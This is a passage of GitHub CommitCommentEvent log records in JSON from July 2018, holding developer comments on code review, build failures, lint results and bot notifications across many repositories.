* (rr + r + 1));\n>\n> It is always possible to fit a formula to 5 or 6 parameters, but is it\n> worth the trouble ?\n> When the formula is longer than the array we want to replace, I'm not sure\n> we are gaining any insight.\n> The formula will cast in concrete the values, and no more tuning will be\n> possible.\n> When I look at 7 * (rr + r + 1), maybe +2r or +2 or -1 will be better\n> overall, (but would end up to be worse for some rows)\n>\n> The Connected array is some exception and stood the test of time and many\n> attempts to deconstruct the scheme. It elegantly uses 7 seed values (and\n> the 17 and also a simple adjust for eg) to initialize Score\n> Connected[2][2][3][RANK_NB]; which is 2x2x3x6 = 72 scores and 144 if you\n> consider mg and eg too.\n> So modelling 144 values with only 7-10 certainly has value.\n>\n> However, trying to make a formula for the Connected 7 Seed values would\n> not make sense in my view.\n>\n> Hope this help. You are quite creative and hard working, keep up the good\n> spirit.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/cc2e82e25c81e96903dfe7277e8622197b27f458#commitcomment-29801029>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSO3AaR541m36iDiaXn7dA2pIOoYjks5uJdxggaJpZM4VbFpv>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-23T14:36:44Z"}
{"id":"8004328425","type":"CommitCommentEvent","actor":{"login":"annekainicUSDS"},"repo":{"name":"usds/us-forms-system"},"payload":{"comment":{"id":29801276,"position":17,"line":23,"path":"docs/building-a-form/common-definitions.md","commit_id":"97e13c77ce19a99de5c9e60a86424331e18aa19e","created_at":"2018-07-23T14:36:48Z","updated_at":"2018-07-23T14:36:48Z","author_association":"CONTRIBUTOR","body":"Update name here too"}},"created_at":"2018-07-23T14:36:48Z"}
{"id":"8004331080","type":"CommitCommentEvent","actor":{"login":"vincent6767"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29801278,"position":null,"line":null,"path":null,"commit_id":"739e9e39a585370c09c21aca94afc96b47225b22","created_at":"2018-07-23T14:37:14Z","updated_at":"2018-07-23T14:37:14Z","author_association":"NONE","body":"@etsangsplk \r\nOkay, I see. Is it right if I put the comment as follow: \"LoggerFunc is a function that represents an adaptor for external logging library to consumer\"?"}},"created_at":"2018-07-23T14:37:14Z"}
{"id":"8004339099","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"apache/incubator-openwhisk"},"payload":{"comment":{"id":29801297,"position":27,"line":345,"path":"core/controller/src/main/scala/whisk/core/controller/RestAPIs.scala","commit_id":"d1a10d592c47e551b8ba8acc42bd0043afce9da2","created_at":"2018-07-23T14:38:28Z","updated_at":"2018-07-23T14:38:28Z","author_association":"MEMBER","body":"should we add a set of tests for making sure the implementors enforce a consistent contract for handling corner cases and errors: multiple identities for a namespace, failure to find a namespace, service unavailable?"}},"created_at":"2018-07-23T14:38:28Z"}
{"id":"8004340589","type":"CommitCommentEvent","actor":{"login":"joeymagz"},"repo":{"name":"FailcoderAddons/supervillain-ui"},"payload":{"comment":{"id":29801300,"position":null,"line":null,"path":null,"commit_id":"2e077d8eda6f12cc818134c2a2125411d9b2ae37","created_at":"2018-07-23T14:38:43Z","updated_at":"2018-07-23T14:38:43Z","author_association":"COLLABORATOR","body":"Fix #208 "}},"created_at":"2018-07-23T14:38:43Z"}
{"id":"8004343481","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cli"},"payload":{"comment":{"id":29801307,"position":null,"line":null,"path":null,"commit_id":"9f477c083a6c4fc534114610027a0e6a2515315f","created_at":"2018-07-23T14:39:10Z","updated_at":"2018-07-23T14:39:10Z","author_association":"NONE","body":"\n:cold_sweat: It's not you, it's your code. it may not be aligned with your organization's best practices.\n:shipit: We've got some intel on your code - 7 events were tracked in this pull request\n\nTo view a full list of the events <a href='https://github.com/codefresh-io/cli/pull/212/checks?check_run_id=8809987'>click there</a>\n"}},"created_at":"2018-07-23T14:39:10Z"}
{"id":"8004347188","type":"CommitCommentEvent","actor":{"login":"markusthoemmes"},"repo":{"name":"apache/incubator-openwhisk"},"payload":{"comment":{"id":29801317,"position":27,"line":345,"path":"core/controller/src/main/scala/whisk/core/controller/RestAPIs.scala","commit_id":"d1a10d592c47e551b8ba8acc42bd0043afce9da2","created_at":"2018-07-23T14:39:45Z","updated_at":"2018-07-23T14:39:45Z","author_association":"CONTRIBUTOR","body":"I thought in the same direction but then wondered if multiple identities for a namespace is in fact an edge-case of **today'** authentication rather than a common property of authentication, if that makes sense?"}},"created_at":"2018-07-23T14:39:45Z"}
{"id":"8004350184","type":"CommitCommentEvent","actor":{"login":"Mbitmds"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801324,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:40:14Z","updated_at":"2018-07-23T14:40:14Z","author_association":"NONE","body":"Great project, very cool guys"}},"created_at":"2018-07-23T14:40:14Z"}
{"id":"8004350846","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29801328,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-23T14:40:19Z","updated_at":"2018-07-23T14:40:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T14:40:19Z"}
{"id":"8004355524","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"bobthecow/psysh"},"payload":{"comment":{"id":29801337,"position":null,"line":null,"path":null,"commit_id":"70f41544ce1dd4883b8d49db2a9b9bb6be2262c7","created_at":"2018-07-23T14:41:01Z","updated_at":"2018-07-23T14:41:01Z","author_association":"CONTRIBUTOR","body":"How to build them?\r\n\r\nIt's not like I don't trust you, but I'd really like to build them myself."}},"created_at":"2018-07-23T14:41:01Z"}
{"id":"8004357897","type":"CommitCommentEvent","actor":{"login":"vincent6767"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29801341,"position":23,"line":145,"path":"README.md","commit_id":"b7be26418a4d8d9627c49ca0865a604a167d4d94","created_at":"2018-07-23T14:41:23Z","updated_at":"2018-07-23T14:41:23Z","author_association":"NONE","body":"@harlow What is a namespace? I don't see it is explained in the readme.md and I can't find it also in the [picture](https://user-images.githubusercontent.com/739782/33085867-d8336122-ce9a-11e7-8c8a-a8afeb09dff1.png)."}},"created_at":"2018-07-23T14:41:23Z"}
{"id":"8004358798","type":"CommitCommentEvent","actor":{"login":"hermansewaldus"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801342,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:41:31Z","updated_at":"2018-07-23T14:41:31Z","author_association":"NONE","body":"Great project"}},"created_at":"2018-07-23T14:41:31Z"}
{"id":"8004359199","type":"CommitCommentEvent","actor":{"login":"dotruongsonvp"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801343,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:41:35Z","updated_at":"2018-07-23T14:41:35Z","author_association":"NONE","body":"great\r\n"}},"created_at":"2018-07-23T14:41:35Z"}
{"id":"8004366062","type":"CommitCommentEvent","actor":{"login":"ShitcoinStorm"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801356,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:42:38Z","updated_at":"2018-07-23T14:42:38Z","author_association":"NONE","body":"Would follow this project and learn. "}},"created_at":"2018-07-23T14:42:38Z"}
{"id":"8004369149","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/tensorflow-feedstock"},"payload":{"comment":{"id":29801357,"position":null,"line":null,"path":null,"commit_id":"b5873a3c1feb3aa607a6658a69fe92727bd4db1a","created_at":"2018-07-23T14:43:05Z","updated_at":"2018-07-23T14:43:05Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ghego was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @farhantejani was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T14:43:05Z"}
{"id":"8004371833","type":"CommitCommentEvent","actor":{"login":"james072889"},"repo":{"name":"IAmBlackHacker/Facebook-BruteForce"},"payload":{"comment":{"id":29801361,"position":null,"line":null,"path":null,"commit_id":"3042e23281062a194012daca86ad73b3ccf2f38e","created_at":"2018-07-23T14:43:29Z","updated_at":"2018-07-23T14:43:29Z","author_association":"NONE","body":"how i can download the fb.py and password.txt"}},"created_at":"2018-07-23T14:43:29Z"}
{"id":"8004375820","type":"CommitCommentEvent","actor":{"login":"TheHasnatBD"},"repo":{"name":"TheHasnatBD/uMe"},"payload":{"comment":{"id":29801368,"position":null,"line":null,"path":null,"commit_id":"e91db0205956fea3d4fea674fb2398f8fa67dbbd","created_at":"2018-07-23T14:44:06Z","updated_at":"2018-07-23T14:44:06Z","author_association":"OWNER","body":"decline request compelete "}},"created_at":"2018-07-23T14:44:06Z"}
{"id":"8004380021","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29801382,"position":11,"line":99,"path":"wcfsetup/install/files/lib/data/like/object/LikeObject.class.php","commit_id":"6077024256f9a325daa8b58173c764e62fad24d9","created_at":"2018-07-23T14:44:41Z","updated_at":"2018-07-23T14:44:41Z","author_association":"CONTRIBUTOR","body":"what about `@return \\stdClass[]`? That's more truthy."}},"created_at":"2018-07-23T14:44:41Z"}
{"id":"8004382656","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29801385,"position":null,"line":null,"path":null,"commit_id":"db8e91521a3a700a2a03542a657897c1c105ef77","created_at":"2018-07-23T14:45:04Z","updated_at":"2018-07-23T14:45:04Z","author_association":"MEMBER","body":"Please use \"git pull\" before doing any update ;)"}},"created_at":"2018-07-23T14:45:04Z"}
{"id":"8004387266","type":"CommitCommentEvent","actor":{"login":"AgustiinNoah"},"repo":{"name":"AgustiinNoah/DBZ"},"payload":{"comment":{"id":29801391,"position":null,"line":null,"path":null,"commit_id":"b59db01d58526938831183349a2343ba3ef99a76","created_at":"2018-07-23T14:45:44Z","updated_at":"2018-07-23T14:45:44Z","author_association":"OWNER","body":"p"}},"created_at":"2018-07-23T14:45:44Z"}
{"id":"8004389480","type":"CommitCommentEvent","actor":{"login":"alisaitbilgi"},"repo":{"name":"melikeKucukkurutlu/GitHubWeb"},"payload":{"comment":{"id":29801392,"position":22,"line":65,"path":"GitHubBadge.html","commit_id":"07897425924dea64e293482fef9a1e3f266c6423","created_at":"2018-07-23T14:46:05Z","updated_at":"2018-07-23T14:46:05Z","author_association":"COLLABORATOR","body":"Why you've put your \"<script>\" tag here? Is it the best way of using it? The question: Where to put script tags?"}},"created_at":"2018-07-23T14:46:05Z"}
{"id":"8004392497","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29801402,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T14:46:31Z","updated_at":"2018-07-23T14:46:31Z","author_association":"MEMBER","body":"I'd suggest reverting this change from 7.1 and 7.2 entirely. Considering that we already had to apply a number of followup fixes after this change was committed (I remember both some more build issues and segfaults), and the fact that this is more enhancement than bugfix, I'd say it does not belong on stable branches."}},"created_at":"2018-07-23T14:46:31Z"}
{"id":"8004399394","type":"CommitCommentEvent","actor":{"login":"alisaitbilgi"},"repo":{"name":"melikeKucukkurutlu/GitHubWeb"},"payload":{"comment":{"id":29801413,"position":24,"line":67,"path":"GitHubBadge.html","commit_id":"07897425924dea64e293482fef9a1e3f266c6423","created_at":"2018-07-23T14:47:36Z","updated_at":"2018-07-23T14:47:36Z","author_association":"COLLABORATOR","body":"You've used \"==\" to equality check. There is also \"===\" equality check. What are their differences? Which one should we use?"}},"created_at":"2018-07-23T14:47:36Z"}
{"id":"8004406375","type":"CommitCommentEvent","actor":{"login":"fredgaius"},"repo":{"name":"fredgaius/background-generator"},"payload":{"comment":{"id":29801432,"position":null,"line":null,"path":null,"commit_id":"92a5d53e98417b0c251405fe2a11c7322b0ed258","created_at":"2018-07-23T14:48:38Z","updated_at":"2018-07-23T14:48:38Z","author_association":"OWNER","body":"I only wanted to merge the last with Master.I think this is ok\""}},"created_at":"2018-07-23T14:48:38Z"}
{"id":"8004408623","type":"CommitCommentEvent","actor":{"login":"alisaitbilgi"},"repo":{"name":"melikeKucukkurutlu/GitHubWeb"},"payload":{"comment":{"id":29801446,"position":23,"line":66,"path":"GitHubBadge.html","commit_id":"07897425924dea64e293482fef9a1e3f266c6423","created_at":"2018-07-23T14:48:57Z","updated_at":"2018-07-23T14:48:57Z","author_association":"COLLABORATOR","body":"Instead of looking at element.value you could have checked event.target.value. What is the difference between them?"}},"created_at":"2018-07-23T14:48:57Z"}
{"id":"8004414455","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29801467,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T14:49:50Z","updated_at":"2018-07-23T14:49:50Z","author_association":"MEMBER","body":"There's also https://bugs.php.net/bug.php?id=76651, which is quite likely related to this change as well."}},"created_at":"2018-07-23T14:49:50Z"}
{"id":"8004414504","type":"CommitCommentEvent","actor":{"login":"sachavodka"},"repo":{"name":"sachavodka/Exo5"},"payload":{"comment":{"id":29801468,"position":null,"line":null,"path":null,"commit_id":"f15c763cb6c4fca307bc93a1d01f79bbe01e31e5","created_at":"2018-07-23T14:49:50Z","updated_at":"2018-07-23T14:49:50Z","author_association":"OWNER","body":"Dernière version avec la gestion des fenêtres multiples"}},"created_at":"2018-07-23T14:49:50Z"}
{"id":"8004415185","type":"CommitCommentEvent","actor":{"login":"oranoceallaigh"},"repo":{"name":"voysis/voysis-js"},"payload":{"comment":{"id":29801470,"position":26,"line":425,"path":"test/client.html","commit_id":"6a32137f90e9eba0aede0cdb24a738cc94f43ef7","created_at":"2018-07-23T14:49:56Z","updated_at":"2018-07-23T14:49:56Z","author_association":"COLLABORATOR","body":"Still an issue: lines 425 through 432 need to be indented another level as these are the body of the anonymous function being passed to `then` at the end of line 424."}},"created_at":"2018-07-23T14:49:56Z"}
{"id":"8004417846","type":"CommitCommentEvent","actor":{"login":"Digital21"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801474,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:50:21Z","updated_at":"2018-07-23T14:50:21Z","author_association":"NONE","body":"Amazing innovative logistics project."}},"created_at":"2018-07-23T14:50:21Z"}
{"id":"8004422189","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29801485,"position":null,"line":null,"path":null,"commit_id":"cc2e82e25c81e96903dfe7277e8622197b27f458","created_at":"2018-07-23T14:51:00Z","updated_at":"2018-07-23T14:51:00Z","author_association":"NONE","body":"> Are you saying that something like this would not pass as a simplification\r\n\r\nYou can hand fill the master arrays with your best formula values and try some [0, 4]\r\n"}},"created_at":"2018-07-23T14:51:00Z"}
{"id":"8004427947","type":"CommitCommentEvent","actor":{"login":"bobwhitelock"},"repo":{"name":"alces-software/userware"},"payload":{"comment":{"id":29801492,"position":21,"line":138,"path":"directory/cli/src/import_export.py","commit_id":"f364ba4f8c77983bf60a5ac059539d1af72b55b8","created_at":"2018-07-23T14:51:52Z","updated_at":"2018-07-23T14:51:52Z","author_association":"MEMBER","body":"Have you tested things after making this change? AFAICS this won't work as this is invalid Python syntax (the code here is now indented too far). If we wanted this to work without this conditional then we'd need to un-indent this code, and we should probably also reword the comment since it no longer makes sense without the conditional. However as mentioned in https://github.com/alces-software/userware/issues/13#issuecomment-406228897:\r\n\r\n> I also mentioned removing the existing use of `in_sandbox` since once this is done it can never be hit, but thinking about it more it may be worth just keeping this for now in case we later re-allow access to `import` and `export` within the sandbox.\r\n\r\nso we may instead want to leave this code as it was before for now."}},"created_at":"2018-07-23T14:51:52Z"}
{"id":"8004431045","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"RMerl/asuswrt-merlin.ng"},"payload":{"comment":{"id":29801502,"position":null,"line":null,"path":null,"commit_id":"d307e547b95b627c6cc2610819c2a7a47519fa76","created_at":"2018-07-23T14:52:21Z","updated_at":"2018-07-23T14:52:21Z","author_association":"NONE","body":"why not just use html5 input `type=\"number\"` with min and max set?"}},"created_at":"2018-07-23T14:52:21Z"}
{"id":"8004432066","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29801506,"position":null,"line":null,"path":null,"commit_id":"1ea929f071a991db08592e714331602d1cfc40a1","created_at":"2018-07-23T14:52:30Z","updated_at":"2018-07-23T14:52:30Z","author_association":"MEMBER","body":"We should use git instead of archives for these kind of recipes, bitbake example: https://github.com/OpenPLi/openpli-oe-core/blob/develop/meta-openpli/recipes-multimedia/dvbsnoop/dvbsnoop.bb\r\n\r\nExcept for kernel itself as it's going to take time like ever."}},"created_at":"2018-07-23T14:52:30Z"}
{"id":"8004434013","type":"CommitCommentEvent","actor":{"login":"SIMONJOSUE1"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801509,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:52:47Z","updated_at":"2018-07-23T14:52:47Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-23T14:52:47Z"}
{"id":"8004434569","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29801511,"position":null,"line":null,"path":null,"commit_id":"db8e91521a3a700a2a03542a657897c1c105ef77","created_at":"2018-07-23T14:52:52Z","updated_at":"2018-07-23T14:52:52Z","author_association":"CONTRIBUTOR","body":"I used \"git pull\" and it caused this commit, I should have used \"git pull --rebase\".\r\nsorry :)"}},"created_at":"2018-07-23T14:52:52Z"}
{"id":"8004437486","type":"CommitCommentEvent","actor":{"login":"mwsht"},"repo":{"name":"MyWorkShop/Tensorflow-DeconvNet-Segmentation"},"payload":{"comment":{"id":29801520,"position":null,"line":null,"path":null,"commit_id":"8a14435b18b8679eed92c0a1e0e65ae7c83d92a0","created_at":"2018-07-23T14:53:17Z","updated_at":"2018-07-23T14:53:17Z","author_association":"MEMBER","body":"I download the dataset using axel, the code used to download here is too slow in PRC."}},"created_at":"2018-07-23T14:53:17Z"}
{"id":"8004443969","type":"CommitCommentEvent","actor":{"login":"trekhleb"},"repo":{"name":"trekhleb/javascript-algorithms"},"payload":{"comment":{"id":29801528,"position":null,"line":null,"path":null,"commit_id":"76c172b20ba10981c9808b29a07d2391e963fda3","created_at":"2018-07-23T14:54:18Z","updated_at":"2018-07-23T14:54:18Z","author_association":"OWNER","body":"No problem @dubzzz \r\nThanks for your effort!"}},"created_at":"2018-07-23T14:54:18Z"}
{"id":"8004445188","type":"CommitCommentEvent","actor":{"login":"KalleZ"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29801530,"position":null,"line":null,"path":null,"commit_id":"c0ef58e9fe78e9d982d48983386763f9d34088bb","created_at":"2018-07-23T14:54:29Z","updated_at":"2018-07-23T14:54:29Z","author_association":"CONTRIBUTOR","body":"@nikic Is GenerateTests even used today? I was under the impression that this was related to the failed(?)/inactive phpruntests project[1].\r\n\r\nEither way I think its bad to keep around a library we potentially never use, just wanted some input before maybe going forward with this on internals@.\r\n\r\n[1] https://git.php.net/?p=phpruntests.git;a=summary"}},"created_at":"2018-07-23T14:54:29Z"}
{"id":"8004448823","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29801537,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-23T14:55:02Z","updated_at":"2018-07-23T14:55:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T14:55:02Z"}
{"id":"8004470861","type":"CommitCommentEvent","actor":{"login":"chenzaijian"},"repo":{"name":"chenzaijian/mywork"},"payload":{"comment":{"id":29801568,"position":null,"line":null,"path":null,"commit_id":"02aa61218efbd0707b8ea035503df74052bf452e","created_at":"2018-07-23T14:58:15Z","updated_at":"2018-07-23T14:58:15Z","author_association":"OWNER","body":"存在跨域问题\r\n"}},"created_at":"2018-07-23T14:58:15Z"}
{"id":"8004472494","type":"CommitCommentEvent","actor":{"login":"skmedix"},"repo":{"name":"NightFurySL2001/SKlauncher"},"payload":{"comment":{"id":29801571,"position":null,"line":null,"path":null,"commit_id":"f5874043e3c76720cef52b36b9e827ac74010bfa","created_at":"2018-07-23T14:58:30Z","updated_at":"2018-07-23T14:58:30Z","author_association":"NONE","body":"Hey, could you create a **Pull Request** with this changes? https://github.com/skmedix/SKlauncher/pull/new/master\r\n\r\nAbout account, at the moment you can't log in in the launcher with login details from the website, to use that account you need to mark the Offline Checkbox in login screen ;)\r\n\r\nIf you have more questions write them in Pull Request or join our Discord server https://discord.gg/BdCcpDZ"}},"created_at":"2018-07-23T14:58:30Z"}
{"id":"8004473808","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-bears"},"payload":{"comment":{"id":29801572,"position":null,"line":null,"path":null,"commit_id":"2d16616ce078e273c382315b679e862a025d11f9","created_at":"2018-07-23T14:58:41Z","updated_at":"2018-07-23T14:58:41Z","author_association":"COLLABORATOR","body":"Comment on 2d16616ce078e273c382315b679e862a025d11f9.\n\nThere are 18 results for the section all.autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | bears/c_languages/ClangBear.py | 54 |\n| The code does not comply to PEP8. | bears/c_languages/ClangBear.py | 57 |\n| The code does not comply to PEP8. | bears/c_languages/ClangBear.py | 69 |\n| E305 expected 2 blank lines after class or function definition, found 1 | bears/c_languages/ClangBear.py | 54 |\n| E227 missing whitespace around bitwise or shift operator | bears/c_languages/ClangBear.py | 54 |\n| E225 missing whitespace around operator | bears/c_languages/ClangBear.py | 54 |\n| E302 expected 2 blank lines, found 1 | bears/c_languages/ClangBear.py | 56 |\n| E112 expected an indented block | bears/c_languages/ClangBear.py | 57 |\n| E305 expected 2 blank lines after class or function definition, found 0 | bears/c_languages/ClangBear.py | 57 |\n| E225 missing whitespace around operator | bears/c_languages/ClangBear.py | 57 |\n| E225 missing whitespace around operator | bears/c_languages/ClangBear.py | 57 |\n| E225 missing whitespace around operator | bears/c_languages/ClangBear.py | 57 |\n| E302 expected 2 blank lines, found 0 | bears/c_languages/ClangBear.py | 58 |\n| E112 expected an indented block | bears/c_languages/ClangBear.py | 59 |\n| E305 expected 2 blank lines after class or function definition, found 0 | bears/c_languages/ClangBear.py | 59 |\n| E225 missing whitespace around operator | bears/c_languages/ClangBear.py | 59 |\n| E113 unexpected indentation | bears/c_languages/ClangBear.py | 60 |\n| E302 expected 2 blank lines, found 1 | bears/c_languages/ClangBear.py | 71 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-23T14:58:41Z"}
{"id":"8004476228","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29801579,"position":null,"line":null,"path":null,"commit_id":"b9a38b638b3abb2723bd57f922ab034078bbdc1c","created_at":"2018-07-23T14:59:04Z","updated_at":"2018-07-23T14:59:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add \"edit\" button to detail pages.](https://trello.com/c/JlMuIiCX/49-add-edit-button-to-detail-pages)"}},"created_at":"2018-07-23T14:59:04Z"}
{"id":"8004478542","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29801580,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T14:59:24Z","updated_at":"2018-07-23T14:59:24Z","author_association":"NONE","body":"Since this commit, g++ 7.3 is unable to compile f18 anymore:\r\n```\r\n[ 79%] Linking CXX executable leading-zero-bit-count-test\r\ncd test/evaluate && /usr/bin/cmake -E cmake_link_script CMakeFiles/leading-zero-bit-count-test.dir/link.txt --verbose=1\r\n/usr/bin/g++-7.3.0   -std=c++17 -Wall -pedantic -O2 -g -DNDEBUG   CMakeFiles/leading-zero-bit-count-test.dir/leading-zero-bit-count.cc.o  -o leading-zero-bit-count-test -Wl,-rpath,lib/evaluate:test/evaluate:lib/common ../../lib/evaluate/libFortranEvaluate.so libFortranEvaluateTesting.so ../../lib/common/libFortranCommon.so\r\n../../lib/evaluate/libFortranEvaluate.so: undefined reference to `Fortran::parser::QuoteCharacterLiteral(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)'\r\ncollect2: error: ld returned 1 exit status\r\nmake[2]: *** [test/evaluate/CMakeFiles/leading-zero-bit-count-test.dir/build.make:98: test/evaluate/leading-zero-bit-count-test] Error 1\r\n```\r\n"}},"created_at":"2018-07-23T14:59:24Z"}
{"id":"8004479021","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29801581,"position":null,"line":null,"path":null,"commit_id":"b9a38b638b3abb2723bd57f922ab034078bbdc1c","created_at":"2018-07-23T14:59:29Z","updated_at":"2018-07-23T14:59:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create the API to edit details.](https://trello.com/c/Dlnkm8Cw/50-create-the-api-to-edit-details)"}},"created_at":"2018-07-23T14:59:29Z"}
{"id":"8004479524","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29801582,"position":null,"line":null,"path":null,"commit_id":"c6a3a7c6bb026b9de6012da0253f09ccb24a8188","created_at":"2018-07-23T14:59:34Z","updated_at":"2018-07-23T14:59:34Z","author_association":"NONE","body":"I think you pushed it with wrong SPRT bounds, should be a simplification."}},"created_at":"2018-07-23T14:59:34Z"}
{"id":"8004480458","type":"CommitCommentEvent","actor":{"login":"sterne-jaeger"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29801587,"position":40,"line":1306,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T14:59:42Z","updated_at":"2018-07-23T14:59:42Z","author_association":"OWNER","body":"You're right, I changed it accidentally."}},"created_at":"2018-07-23T14:59:42Z"}
